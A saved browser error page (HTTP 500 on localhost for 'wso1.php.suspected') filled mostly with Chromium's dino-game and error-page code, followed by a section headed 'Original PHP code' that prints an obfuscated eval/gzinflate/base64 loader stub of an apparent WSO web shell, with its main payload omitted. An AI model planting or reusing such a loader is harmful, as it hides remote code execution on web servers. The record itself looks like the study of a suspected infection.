   * @param {boolean} showNightMode Night mode activated.
   */
  update(deltaTime, currentSpeed, updateObstacles, showNightMode) {
    this.runningTime += deltaTime;

    if (this.altGameModeActive) {
      this.updateBackgroundEls(deltaTime, currentSpeed);
    }

    for (let i = 0; i < this.horizonLines.length; i++) {
      this.horizonLines[i].update(deltaTime, currentSpeed);
    }

    if (!this.altGameModeActive || Runner.spriteDefinition.HAS_CLOUDS) {
      this.nightMode.update(showNightMode);
      this.updateClouds(deltaTime, currentSpeed);
    }

    if (updateObstacles) {
      this.updateObstacles(deltaTime, currentSpeed);
    }
  },

  /**
   * Update background element positions. Also handles creating new elements.
   * @param {number} elSpeed
   * @param {Array<Object>} bgElArray
   * @param {number} maxBgEl
   * @param {Function} bgElAddFunction
   * @param {number} frequency
   */
  updateBackgroundEl(elSpeed, bgElArray, maxBgEl, bgElAddFunction, frequency) {
    const numElements = bgElArray.length;

    if (numElements) {
      for (let i = numElements - 1; i >= 0; i--) {
        bgElArray[i].update(elSpeed);
      }

      const lastEl = bgElArray[numElements - 1];

      // Check for adding a new element.
      if (numElements < maxBgEl &&
          (this.dimensions.WIDTH - lastEl.xPos) > lastEl.gap &&
          frequency > Math.random()) {
        bgElAddFunction();
      }
    } else {
      bgElAddFunction();
    }
  },

  /**
   * Update the cloud positions.
   * @param {number} deltaTime
   * @param {number} speed
   */
  updateClouds(deltaTime, speed) {
    const elSpeed = this.cloudSpeed / 1000 * deltaTime * speed;
    this.updateBackgroundEl(
        elSpeed, this.clouds, this.config.MAX_CLOUDS, this.addCloud.bind(this),
        this.cloudFrequency);

    // Remove expired elements.
    this.clouds = this.clouds.filter((obj) => !obj.remove);
  },

  /**
   * Update the background element positions.
   * @param {number} deltaTime
   * @param {number} speed
   */
  updateBackgroundEls(deltaTime, speed) {
    this.updateBackgroundEl(
        deltaTime, this.backgroundEls, BackgroundEl.config.MAX_BG_ELS,
        this.addBackgroundEl.bind(this), this.cloudFrequency);

    // Remove expired elements.
    this.backgroundEls = this.backgroundEls.filter((obj) => !obj.remove);
  },

  /**
   * Update the obstacle positions.
   * @param {number} deltaTime
   * @param {number} currentSpeed
   */
  updateObstacles(deltaTime, currentSpeed) {
    const updatedObstacles = this.obstacles.slice(0);

    for (let i = 0; i < this.obstacles.length; i++) {
      const obstacle = this.obstacles[i];
      obstacle.update(deltaTime, currentSpeed);

      // Clean up existing obstacles.
      if (obstacle.remove) {
        updatedObstacles.shift();
      }
    }
    this.obstacles = updatedObstacles;

    if (this.obstacles.length > 0) {
      const lastObstacle = this.obstacles[this.obstacles.length - 1];

      if (lastObstacle && !lastObstacle.followingObstacleCreated &&
          lastObstacle.isVisible() &&
          (lastObstacle.xPos + lastObstacle.width + lastObstacle.gap) <
          this.dimensions.WIDTH) {
        this.addNewObstacle(currentSpeed);
        lastObstacle.followingObstacleCreated = true;
      }
    } else {
      // Create new obstacles.
      this.addNewObstacle(currentSpeed);
    }
  },

  removeFirstObstacle() {
    this.obstacles.shift();
  },

  /**
   * Add a new obstacle.
   * @param {number} currentSpeed
   */
  addNewObstacle(currentSpeed) {
    const obstacleCount =
        Obstacle.types[Obstacle.types.length - 1].type != 'COLLECTABLE' ||
            (Runner.isAltGameModeEnabled() && !this.altGameModeActive ||
             this.altGameModeActive) ?
        Obstacle.types.length - 1 :
        Obstacle.types.length - 2;
    const obstacleTypeIndex =
        obstacleCount > 0 ? getRandomNum(0, obstacleCount) : 0;
    const obstacleType = Obstacle.types[obstacleTypeIndex];

    // Check for multiples of the same type of obstacle.
    // Also check obstacle is available at current speed.
    if ((obstacleCount > 0 && this.duplicateObstacleCheck(obstacleType.type)) ||
        currentSpeed < obstacleType.minSpeed) {
      this.addNewObstacle(currentSpeed);
    } else {
      const obstacleSpritePos = this.spritePos[obstacleType.type];

      this.obstacles.push(new Obstacle(
          this.canvasCtx, obstacleType, obstacleSpritePos, this.dimensions,
          this.gapCoefficient, currentSpeed, obstacleType.width,
          this.altGameModeActive));

      this.obstacleHistory.unshift(obstacleType.type);

      if (this.obstacleHistory.length > 1) {
        this.obstacleHistory.splice(Runner.config.MAX_OBSTACLE_DUPLICATION);
      }
    }
  },

  /**
   * Returns whether the previous two obstacles are the same as the next one.
   * Maximum duplication is set in config value MAX_OBSTACLE_DUPLICATION.
   * @return {boolean}
   */
  duplicateObstacleCheck(nextObstacleType) {
    let duplicateCount = 0;

    for (let i = 0; i < this.obstacleHistory.length; i++) {
      duplicateCount =
          this.obstacleHistory[i] === nextObstacleType ? duplicateCount + 1 : 0;
    }
    return duplicateCount >= Runner.config.MAX_OBSTACLE_DUPLICATION;
  },

  /**
   * Reset the horizon layer.
   * Remove existing obstacles and reposition the horizon line.
   */
  reset() {
    this.obstacles = [];
    for (let l = 0; l < this.horizonLines.length; l++) {
      this.horizonLines[l].reset();
    }

    this.nightMode.reset();
  },

  /**
   * Update the canvas width and scaling.
   * @param {number} width Canvas width.
   * @param {number} height Canvas height.
   */
  resize(width, height) {
    this.canvas.width = width;
    this.canvas.height = height;
  },

  /**
   * Add a new cloud to the horizon.
   */
  addCloud() {
    this.clouds.push(new Cloud(this.canvas, this.spritePos.CLOUD,
        this.dimensions.WIDTH));
  },

  /**
   * Add a random background element to the horizon.
   */
  addBackgroundEl() {
    const backgroundElTypes =
        Object.keys(Runner.spriteDefinition.BACKGROUND_EL);

    if (backgroundElTypes.length > 0) {
      let index = getRandomNum(0, backgroundElTypes.length - 1);
      let type = backgroundElTypes[index];

      // Add variation if available.
      while (type == this.lastEl && backgroundElTypes.length > 1) {
        index = getRandomNum(0, backgroundElTypes.length - 1);
        type = backgroundElTypes[index];
      }

      this.lastEl = type;
      this.backgroundEls.push(new BackgroundEl(
          this.canvas, this.spritePos.BACKGROUND_EL, this.dimensions.WIDTH,
          type));
    }
  },
};
</script>
  <script>// Copyright 2021 The Chromium Authors
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.

/* @const
 * Add matching sprite definition and config to Runner.spriteDefinitionByType.
 */
const GAME_TYPE = [];

/**
 * Obstacle definitions.
 * minGap: minimum pixel space between obstacles.
 * multipleSpeed: Speed at which multiples are allowed.
 * speedOffset: speed faster / slower than the horizon.
 * minSpeed: Minimum speed which the obstacle can make an appearance.
 *
 * @typedef {{
 *   type: string,
 *   width: number,
 *   height: number,
 *   yPos: number,
 *   multipleSpeed: number,
 *   minGap: number,
 *   minSpeed: number,
 *   collisionBoxes: Array<CollisionBox>,
 * }}
 */
let ObstacleType;

/**
 * T-Rex runner sprite definitions.
 */
Runner.spriteDefinitionByType = {
  original: {
    LDPI: {
      BACKGROUND_EL: {x: 86, y: 2},
      CACTUS_LARGE: {x: 332, y: 2},
      CACTUS_SMALL: {x: 228, y: 2},
      OBSTACLE_2: {x: 332, y: 2},
      OBSTACLE: {x: 228, y: 2},
      CLOUD: {x: 86, y: 2},
      HORIZON: {x: 2, y: 54},
      MOON: {x: 484, y: 2},
      PTERODACTYL: {x: 134, y: 2},
      RESTART: {x: 2, y: 68},
      TEXT_SPRITE: {x: 655, y: 2},
      TREX: {x: 848, y: 2},
      STAR: {x: 645, y: 2},
      COLLECTABLE: {x: 2, y: 2},
      ALT_GAME_END: {x: 121, y: 2},
    },
    HDPI: {
      BACKGROUND_EL: {x: 166, y: 2},
      CACTUS_LARGE: {x: 652, y: 2},
      CACTUS_SMALL: {x: 446, y: 2},
      OBSTACLE_2: {x: 652, y: 2},
      OBSTACLE: {x: 446, y: 2},
      CLOUD: {x: 166, y: 2},
      HORIZON: {x: 2, y: 104},
      MOON: {x: 954, y: 2},
      PTERODACTYL: {x: 260, y: 2},
      RESTART: {x: 2, y: 130},
      TEXT_SPRITE: {x: 1294, y: 2},
      TREX: {x: 1678, y: 2},
      STAR: {x: 1276, y: 2},
      COLLECTABLE: {x: 4, y: 4},
      ALT_GAME_END: {x: 242, y: 4},
    },
    MAX_GAP_COEFFICIENT: 1.5,
    MAX_OBSTACLE_LENGTH: 3,
    HAS_CLOUDS: 1,
    BOTTOM_PAD: 10,
    TREX: {
      WAITING_1: {x: 44, w: 44, h: 47, xOffset: 0},
      WAITING_2: {x: 0, w: 44, h: 47, xOffset: 0},
      RUNNING_1: {x: 88, w: 44, h: 47, xOffset: 0},
      RUNNING_2: {x: 132, w: 44, h: 47, xOffset: 0},
      JUMPING: {x: 0, w: 44, h: 47, xOffset: 0},
      CRASHED: {x: 220, w: 44, h: 47, xOffset: 0},
      COLLISION_BOXES: [
        new CollisionBox(22, 0, 17, 16),
        new CollisionBox(1, 18, 30, 9),
        new CollisionBox(10, 35, 14, 8),
        new CollisionBox(1, 24, 29, 5),
        new CollisionBox(5, 30, 21, 4),
        new CollisionBox(9, 34, 15, 4),
      ],
    },
    /** @type {Array<ObstacleType>} */
    OBSTACLES: [
      {
        type: 'CACTUS_SMALL',
        width: 17,
        height: 35,
        yPos: 105,
        multipleSpeed: 4,
        minGap: 120,
        minSpeed: 0,
        collisionBoxes: [
          new CollisionBox(0, 7, 5, 27),
          new CollisionBox(4, 0, 6, 34),
          new CollisionBox(10, 4, 7, 14),
        ],
      },
      {
        type: 'CACTUS_LARGE',
        width: 25,
        height: 50,
        yPos: 90,
        multipleSpeed: 7,
        minGap: 120,
        minSpeed: 0,
        collisionBoxes: [
          new CollisionBox(0, 12, 7, 38),
          new CollisionBox(8, 0, 7, 49),
          new CollisionBox(13, 10, 10, 38),
        ],
      },
      {
        type: 'PTERODACTYL',
        width: 46,
        height: 40,
        yPos: [100, 75, 50],    // Variable height.
        yPosMobile: [100, 50],  // Variable height mobile.
        multipleSpeed: 999,
        minSpeed: 8.5,
        minGap: 150,
        collisionBoxes: [
          new CollisionBox(15, 15, 16, 5),
          new CollisionBox(18, 21, 24, 6),
          new CollisionBox(2, 14, 4, 3),
          new CollisionBox(6, 10, 4, 7),
          new CollisionBox(10, 8, 6, 9),
        ],
        numFrames: 2,
        frameRate: 1000 / 6,
        speedOffset: .8,
      },
    ],
    BACKGROUND_EL: {
      'CLOUD': {
        HEIGHT: 14,
        MAX_CLOUD_GAP: 400,
        MAX_SKY_LEVEL: 30,
        MIN_CLOUD_GAP: 100,
        MIN_SKY_LEVEL: 71,
        OFFSET: 4,
        WIDTH: 46,
        X_POS: 1,
        Y_POS: 120,
      },
    },
    BACKGROUND_EL_CONFIG: {
      MAX_BG_ELS: 1,
      MAX_GAP: 400,
      MIN_GAP: 100,
      POS: 0,
      SPEED: 0.5,
      Y_POS: 125,
    },
    LINES: [
      {SOURCE_X: 2, SOURCE_Y: 52, WIDTH: 600, HEIGHT: 12, YPOS: 127},
    ],
  },
};
</script>
  
</head>
<body id="t" class="neterror" style="font-family: &quot;sans&quot;, Arial, sans-serif; font-size: 75%" jstcache="0">
  <div id="main-frame-error" class="interstitial-wrapper" jstcache="0">
    <div id="main-content" jstcache="0">
      <div class="icon icon-generic" jstcache="0"></div>
      <div id="main-message" jstcache="0">
        <h1 jstcache="0">
          <span jsselect="heading" jsvalues=".innerHTML:msg" jstcache="9">This page isn’t working</span>
          <a id="error-information-button" class="hidden" onclick="toggleErrorInformationPopup();" jstcache="0"></a>
        </h1>
        <p jsselect="summary" jsvalues=".innerHTML:msg" jstcache="1"><strong jscontent="hostName" jstcache="22">localhost</strong> is currently unable to handle this request.</p>
        <!--The suggestion list and error code are normally presented inline,
          in which case error-information-popup-* divs have no effect. When
          error-information-popup-container has the use-popup-container class, this
          information is provided in a popup instead.-->
        <div id="error-information-popup-container" jstcache="0">
          <div id="error-information-popup" jstcache="0">
            <div id="error-information-popup-box" jstcache="0">
              <div id="error-information-popup-content" jstcache="0">
                <div id="suggestions-list" style="display:none" jsdisplay="(suggestionsSummaryList &amp;&amp; suggestionsSummaryList.length)" jstcache="16">
                  <p jsvalues=".innerHTML:suggestionsSummaryListHeader" jstcache="18"></p>
                  <ul jsvalues=".className:suggestionsSummaryList.length == 1 ? 'single-suggestion' : ''" jstcache="19">
                    <li jsselect="suggestionsSummaryList" jsvalues=".innerHTML:summary" jstcache="21"></li>
                  </ul>
                </div>
                <div class="error-code" jscontent="errorCode" jstcache="17">HTTP ERROR 500</div>
                <p id="error-information-popup-close" jstcache="0">
                  <a class="link-button" jscontent="closeDescriptionPopup" onclick="toggleErrorInformationPopup();" jstcache="20">null</a>
                </p>
              </div>
            </div>
          </div>
        </div>
        <div id="download-links-wrapper" class="hidden" jstcache="0">
          <div id="download-link-wrapper" jstcache="0">
            <a id="download-link" class="link-button" onclick="downloadButtonClick()" jsselect="downloadButton" jscontent="msg" jsvalues=".disabledText:disabledMsg" jstcache="6" style="display: none;">
            </a>
          </div>
          <div id="download-link-clicked-wrapper" class="hidden" jstcache="0">
            <div id="download-link-clicked" class="link-button" jsselect="downloadButton" jscontent="disabledMsg" jstcache="11" style="display: none;">
            </div>
          </div>
        </div>
        <div id="save-page-for-later-button" class="hidden" jstcache="0">
          <a class="link-button" onclick="savePageLaterClick()" jsselect="savePageLater" jscontent="savePageMsg" jstcache="10" style="display: none;">
          </a>
        </div>
        <div id="cancel-save-page-button" class="hidden" onclick="cancelSavePageClick()" jsselect="savePageLater" jsvalues=".innerHTML:cancelMsg" jstcache="4" style="display: none;">
        </div>
        <div id="offline-content-list" class="list-hidden" hidden="" jstcache="0">
          <div id="offline-content-list-visibility-card" onclick="toggleOfflineContentListVisibility(true)" jstcache="0">
            <div id="offline-content-list-title" jsselect="offlineContentList" jscontent="title" jstcache="12" style="display: none;">
            </div>
            <div jstcache="0">
              <div id="offline-content-list-show-text" jsselect="offlineContentList" jscontent="showText" jstcache="14" style="display: none;">
              </div>
              <div id="offline-content-list-hide-text" jsselect="offlineContentList" jscontent="hideText" jstcache="15" style="display: none;">
              </div>
            </div>
          </div>
          <div id="offline-content-suggestions" jstcache="0"></div>
          <div id="offline-content-list-action" jstcache="0">
            <a class="link-button" onclick="launchDownloadsPage()" jsselect="offlineContentList" jscontent="actionText" jstcache="13" style="display: none;">
            </a>
          </div>
        </div>
      </div>
    </div>
    <div id="buttons" class="nav-wrapper suggested-right" jstcache="0">
      <div id="control-buttons" jstcache="0">
        <button id="reload-button" class="blue-button text-button" onclick="reloadButtonClick(this.url);" jsselect="reloadButton" jsvalues=".url:reloadUrl" jscontent="msg" jstcache="5">Reload</button>
        <button id="download-button" class="blue-button text-button" onclick="downloadButtonClick()" jsselect="downloadButton" jscontent="msg" jsvalues=".disabledText:disabledMsg" jstcache="6" style="display: none;">
        </button>
      </div>
      <button id="details-button" class="secondary-button text-button small-link" onclick="detailsButtonClick(); toggleHelpBox()" jscontent="details" jsdisplay="(suggestionsDetails &amp;&amp; suggestionsDetails.length > 0) || diagnose" jsvalues=".detailsText:details; .hideDetailsText:hideDetails;" jstcache="2" style="display: none;"></button>
    </div>
    <div id="details" class="hidden" jstcache="0">
      <div class="suggestions" jsselect="suggestionsDetails" jstcache="3" jsinstance="*0" style="display: none;">
        <div class="suggestion-header" jsvalues=".innerHTML:header" jstcache="7"></div>
        <div class="suggestion-body" jsvalues=".innerHTML:body" jstcache="8"></div>
      </div>
    </div>
  </div>
  <div id="sub-frame-error" jstcache="0">
    <!-- Show details when hovering over the icon, in case the details are
         hidden because they're too large. -->
    <div class="icon" jstcache="0"></div>
    <div id="sub-frame-error-details" jsselect="summary" jsvalues=".innerHTML:msg" jstcache="1"><strong jscontent="hostName" jstcache="22">localhost</strong> is currently unable to handle this request.</div>
  </div>

  <div id="offline-resources" jstcache="0">
    <img id="offline-resources-1x" src="data:image/png;base64," jstcache="0">
    <img id="offline-resources-2x" src="data:image/png;base64," jstcache="0">
    <template id="audio-resources" jstcache="0">
      <audio id="offline-sound-press" src="data:audio/mpeg;base64,"></audio>
      <audio id="offline-sound-hit" src="data:audio/mpeg;base64,
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"></audio>
    </template>
  </div>


<script jstcache="0">// Copyright 2012 The Chromium Authors
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.

/**
 * @fileoverview
 * NOTE: This file is deprecated, and provides only the minimal LoadTimeData
 * functions for places in the code still not using JS modules. Use
 * load_time_data.m.js in all new code.
 *
 * This file defines a singleton which provides access to all data
 * that is available as soon as the page's resources are loaded (before DOM
 * content has finished loading). This data includes both localized strings and
 * any data that is important to have ready from a very early stage (e.g. things
 * that must be displayed right away).
 *
 * Note that loadTimeData is not guaranteed to be consistent between page
 * refreshes (https://crbug.com/740629) and should not contain values that might
 * change if the page is re-opened later.
 */

/** @type {!LoadTimeData} */
// eslint-disable-next-line no-var
var loadTimeData;

class LoadTimeData {
  constructor() {
    /** @type {?Object} */
    this.data_ = null;
  }

  /**
   * Sets the backing object.
   *
   * Note that there is no getter for |data_| to discourage abuse of the form:
   *
   *     var value = loadTimeData.data()['key'];
   *
   * @param {Object} value The de-serialized page data.
   */
  set data(value) {
    expect(!this.data_, 'Re-setting data.');
    this.data_ = value;
  }

  /**
   * @param {string} id An ID of a value that might exist.
   * @return {boolean} True if |id| is a key in the dictionary.
   */
  valueExists(id) {
    return id in this.data_;
  }

  /**
   * Fetches a value, expecting that it exists.
   * @param {string} id The key that identifies the desired value.
   * @return {*} The corresponding value.
   */
  getValue(id) {
    expect(this.data_, 'No data. Did you remember to include strings.js?');
    const value = this.data_[id];
    expect(typeof value !== 'undefined', 'Could not find value for ' + id);
    return value;
  }

  /**
   * As above, but also makes sure that the value is a string.
   * @param {string} id The key that identifies the desired string.
   * @return {string} The corresponding string value.
   */
  getString(id) {
    const value = this.getValue(id);
    expectIsType(id, value, 'string');
    return /** @type {string} */ (value);
  }

  /**
   * Returns a formatted localized string where $1 to $9 are replaced by the
   * second to the tenth argument.
   * @param {string} id The ID of the string we want.
   * @param {...(string|number)} var_args The extra values to include in the
   *     formatted output.
   * @return {string} The formatted string.
   */
  getStringF(id, var_args) {
    const value = this.getString(id);
    if (!value) {
      return '';
    }

    const args = Array.prototype.slice.call(arguments);
    args[0] = value;
    return this.substituteString.apply(this, args);
  }

  /**
   * Returns a formatted localized string where $1 to $9 are replaced by the
   * second to the tenth argument. Any standalone $ signs must be escaped as
   * $$.
   * @param {string} label The label to substitute through.
   *     This is not an resource ID.
   * @param {...(string|number)} var_args The extra values to include in the
   *     formatted output.
   * @return {string} The formatted string.
   */
  substituteString(label, var_args) {
    const varArgs = arguments;
    return label.replace(/\$(.|$|\n)/g, function(m) {
      expect(m.match(/\$[$1-9]/), 'Unescaped $ found in localized string.');
      return m === '$$' ? '$' : varArgs[m[1]];
    });
  }

  /**
   * As above, but also makes sure that the value is a boolean.
   * @param {string} id The key that identifies the desired boolean.
   * @return {boolean} The corresponding boolean value.
   */
  getBoolean(id) {
    const value = this.getValue(id);
    expectIsType(id, value, 'boolean');
    return /** @type {boolean} */ (value);
  }

  /**
   * As above, but also makes sure that the value is an integer.
   * @param {string} id The key that identifies the desired number.
   * @return {number} The corresponding number value.
   */
  getInteger(id) {
    const value = this.getValue(id);
    expectIsType(id, value, 'number');
    expect(value === Math.floor(value), 'Number isn\'t integer: ' + value);
    return /** @type {number} */ (value);
  }

  /**
   * Override values in loadTimeData with the values found in |replacements|.
   * @param {Object} replacements The dictionary object of keys to replace.
   */
  overrideValues(replacements) {
    expect(
        typeof replacements === 'object',
        'Replacements must be a dictionary object.');
    for (const key in replacements) {
      this.data_[key] = replacements[key];
    }
  }
}

/**
 * Checks condition, throws error message if expectation fails.
 * @param {*} condition The condition to check for truthiness.
 * @param {string} message The message to display if the check fails.
 */
function expect(condition, message) {
  if (!condition) {
    throw new Error(
        'Unexpected condition on ' + document.location.href + ': ' + message);
  }
}

/**
 * Checks that the given value has the given type.
 * @param {string} id The id of the value (only used for error message).
 * @param {*} value The value to check the type on.
 * @param {string} type The type we expect |value| to be.
 */
function expectIsType(id, value, type) {
  expect(
      typeof value === type, '[' + value + '] (' + id + ') is not a ' + type);
}

expect(!loadTimeData, 'should only include this file once');
loadTimeData = new LoadTimeData();

// Expose |loadTimeData| directly on |window|, since within a JS module the
// scope is local and not all files have been updated to import the exported
// |loadTimeData| explicitly.
window.loadTimeData = loadTimeData;

console.warn('crbug/1173575, non-JS module files deprecated.');
</script><script jstcache="0">const pageData = {"details":"Details","errorCode":"HTTP ERROR 500","fontfamily":"\"sans\", Arial, sans-serif","fontsize":"75%","heading":{"hostName":"localhost","msg":"This page isn’t working"},"hideDetails":"Hide details","iconClass":"icon-generic","language":"en","reloadButton":{"msg":"Reload","reloadUrl":"http://localhost/wso1.php.suspected"},"suggestionsDetails":[],"suggestionsSummaryList":[],"summary":{"failedUrl":"http://localhost/wso1.php.suspected","hostName":"localhost","msg":"\u003Cstrong jscontent=\"hostName\">\u003C/strong> is currently unable to handle this request."},"textdirection":"ltr","title":"localhost"};loadTimeData.data = pageData;var tp = document.getElementById('t');jstProcess(new JsEvalContext(pageData), tp);</script></body></html>

Original PHP code

<?php
$stt1 = "Sy1LzNFQt7dT10uvKs1Lzs8tKEotLtZIr8rMS8tJLEnVSEosTjUziU9JT\x635PSdUoLikqSi3TU\x43kuKTHQ\x42\x41Fr\x41\x41\x3d\x3d";
$stt0 = "[encoded payload string omitted]";
eval(htmlspecialchars_decode(gzinflate(base64_decode($stt1))));
?>